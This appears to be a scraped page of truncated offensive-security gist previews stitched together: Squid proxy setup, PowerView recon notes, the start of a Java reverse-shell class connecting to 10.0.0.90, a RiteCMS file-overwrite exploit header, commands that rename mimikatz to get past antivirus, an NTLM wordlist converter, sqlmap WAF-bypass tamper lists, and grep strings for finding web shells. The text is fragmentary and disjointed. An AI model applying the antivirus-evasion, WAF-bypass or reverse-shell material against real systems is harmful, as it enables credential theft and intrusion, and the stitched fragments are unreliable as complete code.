This tutorial is for Ubuntu & Squid3. Use AWS, Google cloud, Digital Ocean or any services with Ubuntu to follow this tutorial.
sudo apt-get update -y
sudo apt-get install squid3 -y
sudo apt-get install apache2-utils -y
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
// Not sure where I originally got this from. | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.OutputStream; | |
import java.net.Socket; | |
public class C { | |
public C() throws Exception { | |
String host="10.0.0.90"; |
# Exploit Title: RiteCMS - Arbitrary File Overwrite (Authenticated) | |
# Date: 2021-07-25 | |
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) | |
# Vendor Homepage: https://ritecms.com/ | |
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip | |
# Version: <= 3.1.0 | |
# Google Dork: intext:"Powered by RiteCMS" | |
# Tested on: Windows 10, Ubuntu 18, XAMPP | |
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/candycrush | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g' |
import hashlib | |
import argparse | |
parser = argparse.ArgumentParser(description='Password to NTLM') | |
parser.add_argument("-w","--wordlist",required=True, help = "wordlist file to be converted to NTLM") | |
args = parser.parse_args() | |
wordfile = args.wordlist | |
total_converted = 0 | |
f = open(wordfile, "r") |
https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3 | |
# All scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
``` | |
# General scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
``` |
The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper=
parameter of sqlmap
.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests
view.
The scale is 0-5.
# strings for finding backdoor shells, rootkits, botnets, and exploitable functions | |
# grep -Rn "shell *(" /var/www | |
exec | |
passthru | |
shell_exec | |
system | |
phpinfo | |
base64_decode | |
chmod | |
mkdir |
#Faisalfs10x | |
#!/usr/bin/env python | |
import time, subprocess | |
from selenium import webdriver | |
from selenium.webdriver.common.keys import Keys | |
from selenium.webdriver.firefox.options import Options | |
from datetime import datetime | |
def main(): | |